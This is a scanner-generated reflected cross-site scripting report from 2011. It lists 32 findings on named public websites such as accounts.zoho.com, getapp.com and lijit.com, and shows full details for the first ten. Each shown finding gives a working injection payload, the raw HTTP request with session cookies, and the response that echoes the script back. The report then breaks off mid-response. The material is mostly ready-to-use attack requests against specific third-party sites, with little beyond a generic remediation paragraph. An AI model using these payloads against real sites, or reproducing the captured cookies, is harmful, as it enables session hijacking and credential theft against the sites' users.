XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10172011-01

Report generated by XSS.CX at Mon Oct 17 20:16:28 CDT 2011.



1. Cross-site scripting (reflected)

1.1. https://accounts.zoho.com/register [css parameter]

1.2. http://failbook.failblog.org/ [name of an arbitrarily supplied request parameter]

1.3. http://fiveminutegetaway.icanhascheezburger.com/ [name of an arbitrarily supplied request parameter]

1.4. http://www.decide.com/search [q parameter]

1.5. http://www.getapp.com/gaxc.php [name of an arbitrarily supplied request parameter]

1.6. http://www.getapp.com/gaxc.php [name of an arbitrarily supplied request parameter]

1.7. http://www.getapp.com/gaxc.php [x parameter]

1.8. http://www.getapp.com/gaxc.php [x parameter]

1.9. http://www.lijit.com/blog_wijits [id parameter]

1.10. http://www.lijit.com/delivery/fp [n parameter]

1.11. http://www.lijit.com/delivery/serp [ad_hint parameter]

1.12. http://www.lijit.com/delivery/serp [dne parameter]

1.13. http://www.lijit.com/delivery/serp [engine parameter]

1.14. http://www.lijit.com/delivery/serp [engine parameter]

1.15. http://www.lijit.com/delivery/serp [nt parameter]

1.16. http://www.lijit.com/delivery/serp [nt parameter]

1.17. http://www.lijit.com/delivery/serp [nt parameter]

1.18. http://www.lijit.com/delivery/serp [q parameter]

1.19. http://www.lijit.com/delivery/serp [q parameter]

1.20. http://www.lijit.com/delivery/serp [u parameter]

1.21. http://www.lijit.com/delivery/serp [u parameter]

1.22. http://www.lijit.com/delivery/serp [zt parameter]

1.23. http://www.lijit.com/delivery/serp [zt parameter]

1.24. http://www.lijit.com/delivery/serp [zt parameter]

1.25. http://www.lijit.com/delivery/serp [ztb parameter]

1.26. http://www.lijit.com/delivery/serp [ztb parameter]

1.27. http://www.lijit.com/delivery/serp [ztb parameter]

1.28. http://www.lijit.com/search [trackresize parameter]

1.29. http://www.lijit.com/search [uri parameter]

1.30. http://www.lijit.com/search [view parameter]

1.31. http://www.redfin.com/stingray/do/api-get-header-user-menu [callback parameter]

1.32. https://accounts.zoho.com/register [iamcsr cookie]



1. Cross-site scripting (reflected)
There are 32 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://accounts.zoho.com/register [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25792"style%3d"x%3aexpression(alert(1))"7cd8de71c68 was submitted in the css parameter. This input was echoed as 25792"style="x:expression(alert(1))"7cd8de71c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /register?servicename=ZohoCRM&showheader=false&serviceurl=https%3A%2F%2Fzoho.com%2Fcrm%2Flp%2Fsignup-redirect.html&showGoogleYahoo=false&css=https://www.zoho.com/crm/theme/signup2.css25792"style%3d"x%3aexpression(alert(1))"7cd8de71c68 HTTP/1.1
Host: accounts.zoho.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1546431367.1318880860.1318880860.1318880860.1; __utmb=1.2.9.1318880868281; __utmc=1; __utmz=1.1318880860.1.1.utmcsr=getapp.com|utmccn=(referral)|utmcmd=referral|utmcct=/gaxc.php

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 17 Oct 2011 19:49:57 GMT
Server: ZWS
Strict-Transport-Security: max-age=604800
Content-Length: 37573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>

<script
...[SNIP]...
<link href="https://www.zoho.com/crm/theme/signup2.css25792"style="x:expression(alert(1))"7cd8de71c68" type="text/css" rel="stylesheet" />
...[SNIP]...

1.2. http://failbook.failblog.org/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://failbook.failblog.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9531d"><script>alert(1)</script>4dd0aba29c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9531d\"><script>alert(1)</script>4dd0aba29c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9531d"><script>alert(1)</script>4dd0aba29c=1 HTTP/1.1
Host: failbook.failblog.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1393588674-1318814090703; __utma=1.652424973.1318814092.1318814092.1318814092.1; __utmz=1.1318814092.1.1.utmcsr=icanhascheezburger.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 17 Oct 2011 19:38:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://failbook.failblog.org/xmlrpc.php
Link: <http://wp.me/MbUR>; rel=shortlink
Content-Length: 105339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xmlns:fb="http:
...[SNIP]...
<a class="navi" href="http://failbook.failblog.org/page/2/?9531d\"><script>alert(1)</script>4dd0aba29c=1">
...[SNIP]...

1.3. http://fiveminutegetaway.icanhascheezburger.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fiveminutegetaway.icanhascheezburger.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced4d"><script>alert(1)</script>bf839a97d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ced4d\"><script>alert(1)</script>bf839a97d30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ced4d"><script>alert(1)</script>bf839a97d30=1 HTTP/1.1
Host: fiveminutegetaway.icanhascheezburger.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2015719681-1318814064359; tdsu_date=10/16/2011; tdsu_views=2; __utma=1.582518482.1318814066.1318814066.1318814066.1; __utmz=1.1318814066.1.1.utmcsr=blog.cheezburger.com|utmccn=(referral)|utmcmd=referral|utmcct=/; tdsu_state=redisplay

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 17 Oct 2011 19:41:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://fiveminutegetaway.icanhascheezburger.com/xmlrpc.php
Link: <http://wp.me/1McGd>; rel=shortlink
Content-Length: 105930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xmlns:fb="http:
...[SNIP]...
<a class="navi" href="http://fiveminutegetaway.icanhascheezburger.com/page/2/?ced4d\"><script>alert(1)</script>bf839a97d30=1">
...[SNIP]...

1.4. http://www.decide.com/search [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.decide.com
Path:   /search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 73a30<script>alert(1)</script>d2ed23e0d41 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?q=phones73a30<script>alert(1)</script>d2ed23e0d41&o=0&c=20&f=&s=RELEVANCE&src=xhr&act=search&&d=true HTTP/1.1
Host: www.decide.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.decide.com/search/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-210324657-1318813791662; mp_super_properties=%7B%22all%22%3A%20%7B%22%24initial_referrer%22%3A%20%22http%3A//www.madrona.com/venture-capital-investments/portfolio-company.asp%3Fname%3DDecide%26company%3D58%22%2C%22%24initial_referring_domain%22%3A%20%22www.madrona.com%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; posterous_mp=%7B%22all%22%3A%20%7B%22%24initial_referrer%22%3A%20%22http%3A//www.madrona.com/venture-capital-investments/portfolio-company.asp%3Fname%3DDecide%26company%3D58%22%2C%22%24initial_referring_domain%22%3A%20%22www.madrona.com%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Other%20%28mozilla/5.0%20%28compatible%3B%20rogerbot/1.0%3B%20http%3A//www.seomoz.org/dp/rogerbot%29%29%22%2C%22user%22%3A%20%22%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; AWSELB=758B6F670E877E60D5F54BEEB433797CA648B449EC7A46596C3523A0DC0EF640CCB338B04F913BE7D3D7352D1215A35BBF59C2E021ACFAFCD677332939A13465371B925F4D; udc=eyJrZXkiOm51bGwsImxvY2F0aW9uIjpudWxsLCJpZCI6IjA3NzI0NTllLWQ5MjYtNDlkMi1iMzdmLTE3MWJiZTBjMjJmOSIsImxhc3RTZWVuIjoxMzE4ODgwMzA3MjI0LCJzZXR0aW5ncyI6e319; tid=24047ff6c76b68f2-2c6de647d0edaf5f-2c6de647d0edaf5f; __utma=1.180661997.1318814158.1318814158.1318880333.2; __utmb=1.2.10.1318880333; __utmc=1; __utmz=1.1318814158.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0
Content-Language: en-US
Content-Type: application/json;charset=UTF-8
Date: Mon, 17 Oct 2011 19:40:14 GMT
ETag: "0eedcc139ed5af26afb2a4ba967ce7790"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: udc=eyJrZXkiOm51bGwsImxvY2F0aW9uIjpudWxsLCJpZCI6IjA3NzI0NTllLWQ5MjYtNDlkMi1iMzdmLTE3MWJiZTBjMjJmOSIsImxhc3RTZWVuIjoxMzE4ODgwNDE0NDA2LCJzZXR0aW5ncyI6e319; Expires=Sun, 15-Jan-2012 19:40:14 GMT; Path=/
Set-Cookie: tid=24047ff6c76b68f2-6b722ae898ac8e93-6b722ae898ac8e93; Version=1; Max-Age=1200; Expires=Mon, 17-Oct-2011 20:00:14 GMT; Path=/
Content-Length: 574
Connection: keep-alive

{"bypassQueryPath":null,"bypassQueryCategory":null,"resultCount":0,"stats":{},"query":"phones73a30<script>alert(1)</script>d2ed23e0d41","facets":{"empty":false,"facets":{"price":{"facetName":"price","selectedValues":[],"facetValues":[],"facetType":"MONEY","categorySpecific":false,"selectedValue":null}},"orderedFacets":[{"facetName":"
...[SNIP]...

1.5. http://www.getapp.com/gaxc.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.getapp.com
Path:   /gaxc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a09d6'%3balert(1)//c1dd3dfb7d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a09d6';alert(1)//c1dd3dfb7d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gaxc.php?x=zoho-crm-applica/a09d6'%3balert(1)//c1dd3dfb7d2tion HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 864

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-applica/a09d6';alert(1)//c1dd3dfb7d2tion'); setTimeout('window.location="/listings/out/' + s + src + '"', 100); } </script>
...[SNIP]...

1.6. http://www.getapp.com/gaxc.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.getapp.com
Path:   /gaxc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cedff"><script>alert(1)</script>9a5042c804 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gaxc.php?x=zoho-crm-applica/cedff"><script>alert(1)</script>9a5042c804tion HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 892

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-applica/cedff"><script>alert(1)</script>9a5042c804tion'); setTimeout('window.locati
...[SNIP]...
<body onload="r('zoho-crm-applica/cedff"><script>alert(1)</script>9a5042c804tion', '')">
...[SNIP]...

1.7. http://www.getapp.com/gaxc.php [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.getapp.com
Path:   /gaxc.php

Issue detail

The value of the x request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae81'%3balert(1)//faa967cb769 was submitted in the x parameter. This input was echoed as 5ae81';alert(1)//faa967cb769 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gaxc.php?x=zoho-crm-application5ae81'%3balert(1)//faa967cb769 HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 862

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-application5ae81';alert(1)//faa967cb769'); setTimeout('window.location="/listings/out/' + s + src + '"', 100); } </script>
...[SNIP]...

1.8. http://www.getapp.com/gaxc.php [x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.getapp.com
Path:   /gaxc.php

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f85e5"><script>alert(1)</script>3e49d60af19 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gaxc.php?x=zoho-crm-applicationf85e5"><script>alert(1)</script>3e49d60af19 HTTP/1.1
Host: www.getapp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getapp.com/top-apps
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=6sn47bn5l372u6moj10f2tu3m7; wooTracker=W5B902YO2JHQJWPI2WEXKEKDS0VC8NF3; __unam=6cbec6f-1330f8727f6-26bc7dbe-1; is_returning=1; wooMeta=MzM2NDA2JjMmMTImMTQxODI4MyYxMzE4ODE1MTc4OTE5JjEzMTg4ODA4MDU4MDAmJjEwMCYmNTAwMjkwJiYmJg==; __utma=138761509.1636360610.1318815197.1318815197.1318880406.2; __utmb=138761509.4.9.1318880851725; __utmc=138761509; __utmz=138761509.1318815197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 17 Oct 2011 19:47:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Vary: Accept-Encoding
Content-Length: 892

<html>
<head><script type="text/javascript"> function r(s,src) { pageTracker._trackPageview('/listings/out//zoho-crm-applicationf85e5"><script>alert(1)</script>3e49d60af19'); setTimeout('window.locati
...[SNIP]...
<body onload="r('zoho-crm-applicationf85e5"><script>alert(1)</script>3e49d60af19', '')">
...[SNIP]...

1.9. http://www.lijit.com/blog_wijits [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /blog_wijits

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f967b"><script>alert(1)</script>53438fd5b76 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog_wijits?json=0&id=trakrf967b"><script>alert(1)</script>53438fd5b76&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2F&js=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://fiveminutegetaway.icanhascheezburger.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_ts=t=1318814043061828; tpro=eJyVUstuwyAQ%2FJc9I3cJ%2BBHfc%2BwXtBVCmMRINliYVKoi%2F3sX3Ka9%2Bja7zMzOAg9YYri6yUL%2FgJv1g40ZzTp3sJKCwdX%2BVnW7MdC3whWKn6jHgBNqd9QpITPvzBmIWslzLrBlUKNapvtaSk4eUZtiYvTdQE9sfY1Kz8VFr077gka3LgWENOZYSEozummI1me1D2XYmcGX%2FfN23oS5uKMSmNs5Dapmx8RuUHEs1YmyEXyGkzKPCNNk9yV98GVxIf61sWpIdot6UKsZcywSrS7lDG%2BPgqCHVzs4%2Ff5y8cnGpJ2frU9A2yXaV%2FCu61AgXechfneMz%2FEgXx7k19vH83HozySX7%2F3n9NRKBnMYlAl3UvYNg08bVxfo6YBXCNv2DQQkua8%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997; OABLOCK=787.1318813997_785.1318880280_1258.1318880317_3747.1318880285; OACAP=785.6_3841.1_787.7_1258.2_3747.1; OASCAP=785.2_3747.1_1258.1; ljt_reader=9a524261efe1e1588396f48f16471b3c

Response

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 19:42:02 GMT
Server: PWS/8.0.4
X-Px: ms sea-ag1-n10 ( sea-ag1-n1), ms sea-ag1-n1 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 10484
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:42:01 GMT; path=/; domain=.lijit.com
Set-Cookie: user=deleted; expires=Sun, 17-Oct-2010 19:42:01 GMT; path=/; domain=.lijit.com
Set-Cookie: kohanasession=5bgib2vmj2gr1at0bd5ancerg2; path=/; domain=.lijit.com
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI1YmdpYjJ2bWoyZ3IxYXQwYmQ1YW5jZXJnMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e31sYXN0X2FjdGl2aXR5fGk6MTMxODg4MDUyMjs%3D; path=/; domain=.lijit.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Header -->
<head>
   <title>Lij
...[SNIP]...
<input type="hidden" name="destination" value="/blog_wijits?json=0&id=trakrf967b"><script>alert(1)</script>53438fd5b76&uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2F&js=1" />
...[SNIP]...

1.10. http://www.lijit.com/delivery/fp [n parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lijit.com
Path:   /delivery/fp

Issue detail

The value of the n request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5560"%3balert(1)//dd9ec51666c was submitted in the n parameter. This input was echoed as f5560";alert(1)//dd9ec51666c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /delivery/fp?u=buddytv&i=lijit_region_57615&z=57615&n=1f5560"%3balert(1)//dd9ec51666c HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.buddytv.com/ads2/GAM-Deluxe-728x90_Top.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; OABLOCK=787.1318813997_785.1318814029; ljt_ts=t=1318814043061828; OACAP=785.4_3841.1_787.7; ljt_reader=9a524261efe1e1588396f48f16471b3c; _OACAP[1258]=1; _OABLOCK[1258]=1318814747; tpro=eJyVUkFuwyAQ%2FMueUQoGHMf3HvuCtkIIYxvJBgtIpSry37vgNurVt5lldncGeMAWw%2BgWC%2F0DJusHGwtadanQi2gIjPaPyW4noKeq5Yo1WCPAEF0P1Ckuiu7GCHCpxK0Q2hGQVG3LPVXa4IyoTR1i9N1Aj2o9RqXXOkUnp31Fs0tbBSHPxRbFTjO7ZYjWl24f6rIbgW97zGaocN6EtU6nitNSZgLtUNVWgoFaqhg9CDKET3OClxVhWewR0gdfg3Pxr0wvbUtginpQyczFFjYll4uH90dF0MObHZz%2BeHn12casnV%2Btz4DpMublrOuYaCVuO6G%2F8rP67pxeyHN6yfbP5%2BPgn8mu3PvvaXOVBNYwKBPu2Nkj%2B7IxuYBPB%2BxCYd9%2FAAI%2BubU%3D; ljt_csync=rtb_turn%3A1318813997%2Crtb_simplifi%3A1318813997%2Crtb_mmath%3A1318813997%2C1%3A1318813997%2Crtb_media6%3A1318813997

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 19:38:38 GMT
Server: PWS/8.0.4
